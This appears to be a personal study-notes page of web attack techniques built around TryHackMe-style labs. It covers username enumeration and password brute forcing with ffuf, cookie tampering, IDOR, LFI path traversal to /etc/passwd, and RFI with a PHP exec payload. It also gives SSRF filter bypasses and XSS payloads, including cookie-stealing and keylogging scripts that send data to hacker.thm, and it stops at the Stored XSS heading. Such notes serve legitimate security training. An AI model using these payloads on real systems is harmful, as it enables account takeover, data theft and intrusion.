
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
        <link rel="canonical" href="https://grimy86.github.io/Cybersecurity/Gaining%20Access/WebEnum/">
      
      
      
      
      <link rel="icon" href="/assets/Key3.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.6.10">
    
    
      
        <title>Enumeration - Cybersecurity & Code Insights '25</title>
      
    
    
      <link rel="stylesheet" href="../../../assets/stylesheets/main.4af4bdda.min.css">
      
        
        <link rel="stylesheet" href="../../../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="black" data-md-color-accent="orange">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#enumeration" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../../.." title="Cybersecurity &amp; Code Insights &#39;25" class="md-header__button md-logo" aria-label="Cybersecurity & Code Insights '25" data-md-component="logo">
      
  <img src="/assets/Key.png" alt="logo">

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Cybersecurity & Code Insights '25
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Enumeration
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="black" data-md-color-accent="orange"  aria-label="Switch to dark mode"  type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 7a5 5 0 0 1 5 5 5 5 0 0 1-5 5 5 5 0 0 1-5-5 5 5 0 0 1 5-5m0 2a3 3 0 0 0-3 3 3 3 0 0 0 3 3 3 3 0 0 0 3-3 3 3 0 0 0-3-3m0-7 2.39 3.42C13.65 5.15 12.84 5 12 5s-1.65.15-2.39.42zM3.34 7l4.16-.35A7.2 7.2 0 0 0 5.94 8.5c-.44.74-.69 1.5-.83 2.29zm.02 10 1.76-3.77a7.131 7.131 0 0 0 2.38 4.14zM20.65 7l-1.77 3.79a7.02 7.02 0 0 0-2.38-4.15zm-.01 10-4.14.36c.59-.51 1.12-1.14 1.54-1.86.42-.73.69-1.5.83-2.29zM12 22l-2.41-3.44c.74.27 1.55.44 2.41.44.82 0 1.63-.17 2.37-.44z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="black" data-md-color-accent="orange"  aria-label="Switch to light mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m17.75 4.09-2.53 1.94.91 3.06-2.63-1.81-2.63 1.81.91-3.06-2.53-1.94L12.44 4l1.06-3 1.06 3zm3.5 6.91-1.64 1.25.59 1.98-1.7-1.17-1.7 1.17.59-1.98L15.75 11l2.06-.05L18.5 9l.69 1.95zm-2.28 4.95c.83-.08 1.72 1.1 1.19 1.85-.32.45-.66.87-1.08 1.27C15.17 23 8.84 23 4.94 19.07c-3.91-3.9-3.91-10.24 0-14.14.4-.4.82-.76 1.27-1.08.75-.53 1.93.36 1.85 1.19-.27 2.86.69 5.83 2.89 8.02a9.96 9.96 0 0 0 8.02 2.89m-1.64 2.02a12.08 12.08 0 0 1-7.8-3.47c-2.17-2.19-3.33-5-3.49-7.82-2.81 3.14-2.7 7.96.31 10.98 3.02 3.01 7.84 3.12 10.98.31"/></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
      <label class="md-header__button md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
      <div class="md-header__source">
        <a href="https://github.com/grimy86/grimy86.github.io" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.7.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81"/></svg>
  </div>
  <div class="md-source__repository">
    grimy86.github.io
  </div>
</a>
      </div>
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
            
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../.." class="md-tabs__link">
          
  
  
    
  
  Home

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../Programming/P1/Introduction/" class="md-tabs__link">
          
  
  
    
  
  Programming

        </a>
      </li>
    
  

    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../Windows_Internals/Introduction/" class="md-tabs__link">
          
  
  
    
  
  Windows Internals

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../Reverse_Engineering/Intro/" class="md-tabs__link">
          
  
  
    
  
  Reverse Engineering

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../Networks/Networks/" class="md-tabs__link">
          
  
  
    
  
  Networks & CyberSecurity

        </a>
      </li>
    
  

    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../About/changelog/" class="md-tabs__link">
          
  
  
    
  
  About

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../../.." title="Cybersecurity &amp; Code Insights &#39;25" class="md-nav__button md-logo" aria-label="Cybersecurity & Code Insights '25" data-md-component="logo">
      
  <img src="/assets/Key.png" alt="logo">

    </a>
    Cybersecurity & Code Insights '25
  </label>
  
    <div class="md-nav__source">
      <a href="https://github.com/grimy86/grimy86.github.io" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.7.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81"/></svg>
  </div>
  <div class="md-source__repository">
    grimy86.github.io
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    
    
      
        
          
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    <a href="../../.." class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    Home
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    
  
  
  
    <a href="../../../Programming/P1/Introduction/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    Programming
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

  

      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    <a href="../../../Windows_Internals/Introduction/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    Windows Internals
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
      
        
      
        
      
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    <a href="../../../Reverse_Engineering/Intro/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    Reverse Engineering
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    
  
  
  
    <a href="../../../Networks/Networks/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    Networks & CyberSecurity
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

  

      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
      
        
      
        
      
        
      
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    <a href="../../../About/changelog/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    About
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#authentication-bypass" class="md-nav__link">
    <span class="md-ellipsis">
      Authentication Bypass
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#exploit-idor-vulns" class="md-nav__link">
    <span class="md-ellipsis">
      Exploit IDOR vulns
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#local-file-inclusion-lci" class="md-nav__link">
    <span class="md-ellipsis">
      Local File Inclusion (LCI)
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Local File Inclusion (LCI)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#local" class="md-nav__link">
    <span class="md-ellipsis">
      Local
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#remote" class="md-nav__link">
    <span class="md-ellipsis">
      Remote
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#server-side-request-forgery-ssrf" class="md-nav__link">
    <span class="md-ellipsis">
      Server-Side Request Forgery (SSRF)
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Server-Side Request Forgery (SSRF)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#spotting-an-ssrf" class="md-nav__link">
    <span class="md-ellipsis">
      Spotting an SSRF
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#defeating-common-ssrf-defenses" class="md-nav__link">
    <span class="md-ellipsis">
      Defeating Common SSRF Defenses
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#cross-site-scripting-xss" class="md-nav__link">
    <span class="md-ellipsis">
      Cross-site Scripting (XSS)
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Cross-site Scripting (XSS)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#reflected-xss" class="md-nav__link">
    <span class="md-ellipsis">
      Reflected XSS
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#stored-xss" class="md-nav__link">
    <span class="md-ellipsis">
      Stored XSS
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#dom-based-xss" class="md-nav__link">
    <span class="md-ellipsis">
      DOM Based XSS
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#blind-xss" class="md-nav__link">
    <span class="md-ellipsis">
      Blind XSS
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#xss-polyglots" class="md-nav__link">
    <span class="md-ellipsis">
      XSS Polyglots
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#command-injection" class="md-nav__link">
    <span class="md-ellipsis">
      Command Injection
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#sql-injection" class="md-nav__link">
    <span class="md-ellipsis">
      SQL Injection
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  


  
  


<h1 id="enumeration">Enumeration<a class="headerlink" href="#enumeration" title="Permanent link">&para;</a></h1>
<h2 id="authentication-bypass">Authentication Bypass<a class="headerlink" href="#authentication-bypass" title="Permanent link">&para;</a></h2>
<table>
<thead>
<tr>
<th>Type</th>
<th>Description</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>Username Enumeration</td>
<td>Abuse user authentication by looking at server responses like "An account with this username already exists."</td>
<td><code>ffuf -w wordlist.txt -X POST -d "username=FUZZ&amp;email=x&amp;password=x&amp;cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.10.220/customers/signup -mr "username already exists"</code></td>
</tr>
<tr>
<td>Brute force</td>
<td>Brute force search for the password from the enumerated user</td>
<td><code>ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&amp;password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.32.175/customers/login -fc 200</code></td>
</tr>
<tr>
<td>Logic flaws</td>
<td>Abuse faulty code</td>
<td>Exact string matches for <code>admin</code> could be <code>adMIN</code>. <code>Password reset forms</code>, Abuse <code>Header files</code> &amp; <code>requests</code>, <code>Off by one errors</code>, etc.</td>
</tr>
<tr>
<td>Cookie Tampering</td>
<td>Examining and editing the cookies set by the web server during your online session</td>
<td><code>curl -H "Cookie: logged_in=true; admin=true" http://10.10.232.83/cookie-test</code></td>
</tr>
</tbody>
</table>
<h2 id="exploit-idor-vulns">Exploit IDOR vulns<a class="headerlink" href="#exploit-idor-vulns" title="Permanent link">&para;</a></h2>
<p>IDOR stands for Insecure Direct Object Reference and is a type of access control vulnerability.</p>
<p><strong><em>Where are they located?</em></strong>
The vulnerable endpoint you're targeting may not always be something you see in the address bar. It could be content your browser loads in via an AJAX request or something that you find referenced in a JavaScript file.</p>
<p>Sometimes endpoints could have an unreferenced parameter that may have been of some use during development and got pushed to production. For example, you may notice a call to /user/details displaying your user information (authenticated through your session). But through an attack known as parameter mining, you discover a parameter called user_id that you can use to display other users' information, for example, /user/details?user_id=123.</p>
<table>
<thead>
<tr>
<th>Type</th>
<th>Description</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>Basic</td>
<td>Basic example</td>
<td>Change values in links like: <code>http://online-service.thm/profile?user_id=1305</code></td>
</tr>
<tr>
<td>Encoded IDOR IDs</td>
<td>Web developers will often encode data into some type of ASCII string commonly using a-z, A-Z, 0-9 and = characters for padding</td>
<td>Base64: <code>{"id":30}</code> becomes <code>eyJpZCI6MzB9</code></td>
</tr>
<tr>
<td>Hashed IDs</td>
<td>A bit more complicated to deal with than encoded ones, but they may follow a predictable pattern</td>
<td>md5: <code>123</code> becomes <code>202cb962ac59075b964b07152d234b70</code></td>
</tr>
<tr>
<td>Unpredictable IDs</td>
<td>If the Id cannot be detected using the above methods, an excellent method of IDOR detection is to create two accounts and swap the Id numbers between them.</td>
<td>Swap <code>two</code> account IDs</td>
</tr>
</tbody>
</table>
<h2 id="local-file-inclusion-lci">Local File Inclusion (LCI)<a class="headerlink" href="#local-file-inclusion-lci" title="Permanent link">&para;</a></h2>
<h3 id="local">Local<a class="headerlink" href="#local" title="Permanent link">&para;</a></h3>
<p>With PHP, using functions such as include, require, include_once, and require_once often contribute to vulnerable web applications. Theoretically, we can access and display any readable file on a server if there isn't any input validation. Let's say we want to read the <code>/etc/passwd file</code>, we can try the following: <code>http://domain.com/get.php?file=/etc/passwd</code>. In this case, it works because <strong>there isn't a directory specified</strong> in the <code>include</code> function and <strong>no input validation</strong>.</p>
<table>
<thead>
<tr>
<th>Type</th>
<th>Description</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>No specified directory</td>
<td>Get the file just like in a console</td>
<td><code>/get.php?file=/etc/passwd</code></td>
</tr>
<tr>
<td>Specified directory</td>
<td>Use path traversal along with error messages to find the file</td>
<td><code>/get.php?file=../../../../etc/passwd</code></td>
</tr>
<tr>
<td>Specified extension</td>
<td>Use a <code>null byte</code> operator or the current directory trick <code>/.</code> to bypass the extension, the <code>%00</code> trick is patched and not working with PHP 5.3.4 and above.</td>
<td><code>/get.php?file=/etc/passwd%00</code></td>
</tr>
<tr>
<td>Input validation</td>
<td>The web application replaces the ../ with the empty string, the PHP filter only matches and replaces the <strong>first</strong> subset string <code>../</code> it finds and <strong>doesn't do another pass</strong>.</td>
<td><code>....//....//....//....//....//etc/passwd</code></td>
</tr>
<tr>
<td>Include is forced to read from a defined directory</td>
<td>Simply include the directory into the payload</td>
<td><code>/get.php?file=languages/../../../../../etc/passwd</code></td>
</tr>
</tbody>
</table>
<h3 id="remote">Remote<a class="headerlink" href="#remote" title="Permanent link">&para;</a></h3>
<p>Include <strong>remote</strong> files into a vulnerable application. One requirement for RFI is that the <code>allow_url_fopen</code> option needs to be <code>on</code>. The types and examples are  essentially the same as the local file inclusion except we're getting it from a remote server. We could RCE, XSS, DOS, etc. using RFI.</p>
<p><strong>Example</strong>:</p>
<p>On AttackBox nano a file.txt with contents of: 
<div class="language-php highlight"><pre><span></span><code><span id="__span-0-1"><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="cp">&lt;?php</span>
</span><span id="__span-0-2"><a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="k">print</span> <span class="nb">exec</span><span class="p">(</span><span class="s1">&#39;hostname&#39;</span><span class="p">);</span>
</span><span id="__span-0-3"><a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a><span class="cp">?&gt;</span>
</span></code></pre></div>
Then <code>python3 -m http.server</code> and move over to the browser:
<code>http://10.10.21.255/playground.php?file=http://10.10.86.219:8000/x.txt</code></p>
<h2 id="server-side-request-forgery-ssrf">Server-Side Request Forgery (SSRF)<a class="headerlink" href="#server-side-request-forgery-ssrf" title="Permanent link">&para;</a></h2>
<p>A vulnerability that allows a malicious user to cause the webserver to make an additional or edited HTTP request to the resource of the attacker's choosing.
There are two types of SSRF vulnerability; the first is a <code>regular SSRF</code> where <code>data is returned to the attacker's screen</code>. The second is a <code>Blind SSRF</code> vulnerability where an SSRF occurs, but <code>no information is returned to the attacker's screen</code>.</p>
<table>
<thead>
<tr>
<th>Description</th>
<th>Expected request</th>
<th>Hacker request</th>
<th>Server request</th>
</tr>
</thead>
<tbody>
<tr>
<td>URL modification</td>
<td><code>http://website.thm/stock?url=http://api.website.thm/api/stock/item?id=123</code></td>
<td><code>http://website.thm/stock?url=http://api.website.thm/api/user</code></td>
<td><code>http://api.website.thm/api/user</code></td>
</tr>
<tr>
<td>Directory travelsal</td>
<td><code>http://website.thm/stock?url=/item?id=123</code></td>
<td><code>http://website.thm/stock?url=/../user</code></td>
<td><code>http://api.website.thm/api/stock/../user</code></td>
</tr>
<tr>
<td>Control the subdomain</td>
<td><code>http://website.thm/stock?server=api&amp;id=123</code></td>
<td><code>http://website.thm/stock?server=api.website.thm/api/user&amp;x=&amp;id=123</code></td>
<td><code>http://api.website.thm/api/user?x=.website.thm/api/stock/item?id=123</code></td>
</tr>
<tr>
<td>Remote server requests</td>
<td><code>http://website.thm/stock?url=http://api.website.thm/api/stock/item?id=123</code></td>
<td><code>http://website.thm/stock?url=http://hacker-domain.thm</code></td>
<td>Gets skipped, instead we get data from <code>hacker-domain.thm</code></td>
</tr>
</tbody>
</table>
<h3 id="spotting-an-ssrf">Spotting an SSRF<a class="headerlink" href="#spotting-an-ssrf" title="Permanent link">&para;</a></h3>
<ol>
<li>When a full URL is used in a parameter in the address bar.</li>
<li>A hidden field in a form: <code>&lt;input type="hidden" name="server" value="http://server.website.thm/store"&gt;</code></li>
<li>A partial URL such as just the hostname: <code>https://website.thm/form?server=api</code></li>
<li>Or perhaps only the path of the URL: <code>https://website.thm/form?dst=/forms/contact</code></li>
</ol>
<h3 id="defeating-common-ssrf-defenses">Defeating Common SSRF Defenses<a class="headerlink" href="#defeating-common-ssrf-defenses" title="Permanent link">&para;</a></h3>
<ol>
<li>Deny list,  bypass by using alternative localhost references such as 0, 0.0.0.0, 0000, 127.1, 127.<em>.</em>.*, 2130706433, 017700000001 or subdomains that have a DNS record which resolves to the IP Address 127.0.0.1 such as 127.0.0.1.nip.io.</li>
<li>Allow list, circumvent this rule by creating a subdomain on an attacker's domain name, such as https://website.thm.attackers-domain.thm. The application logic would now allow this input and let an attacker control the internal HTTP request.</li>
<li>Open Redirect, Take, for example, the link https://website.thm/link?url=https://tryhackme.com. This endpoint was created to record the number of times visitors have clicked on this link for advertising/marketing purposes. But imagine there was a potential SSRF vulnerability with stringent rules which only allowed URLs beginning with https://website.thm/. An attacker could utilise the above feature to redirect the internal HTTP request to a domain of the attacker's choice.</li>
</ol>
<h2 id="cross-site-scripting-xss">Cross-site Scripting (XSS)<a class="headerlink" href="#cross-site-scripting-xss" title="Permanent link">&para;</a></h2>
<table>
<thead>
<tr>
<th>Description</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>Proof of Concept</td>
<td><code>&lt;script&gt;alert('XSS');&lt;/script&gt;</code></td>
</tr>
<tr>
<td>Session Stealing</td>
<td><code>&lt;script&gt;fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));&lt;/script&gt;</code></td>
</tr>
<tr>
<td>Key Logger</td>
<td><code>&lt;script&gt;document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}&lt;/script&gt;</code></td>
</tr>
<tr>
<td>Business Logic</td>
<td><code>&lt;script&gt;user.changeEmail('attacker@hacker.thm');&lt;/script&gt;</code></td>
</tr>
</tbody>
</table>
<h3 id="reflected-xss">Reflected XSS<a class="headerlink" href="#reflected-xss" title="Permanent link">&para;</a></h3>
<p>User-supplied data in an HTTP request is included in the webpage source without any validation.</p>
<p><div class="language-html highlight"><pre><span></span><code><span id="__span-1-1"><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="p">&lt;</span><span class="nt">div</span> <span class="na">class</span><span class="o">=</span><span class="s">&quot;alert alert-danger&quot;</span><span class="p">&gt;</span>
</span><span id="__span-1-2"><a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a>    <span class="p">&lt;</span><span class="nt">p</span><span class="p">&gt;&lt;</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">&quot;https://attacker.thm/evil.js&quot;</span><span class="p">&gt;&lt;/</span><span class="nt">script</span><span class="p">&gt;&lt;/</span><span class="nt">p</span><span class="p">&gt;</span>
</span><span id="__span-1-3"><a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span>
</span></code></pre></div>
How to test for Reflected XSS:</p>
<p>You'll need to test every possible point of entry; these include:
- Parameters in the URL Query String
- URL File Path
- Sometimes HTTP Headers (although unlikely exploitable in practice)</p>
<h3 id="stored-xss">Stored XSS<a class="headerlink" href="#stored-xss" title="Permanent link">&para;</a></h3>
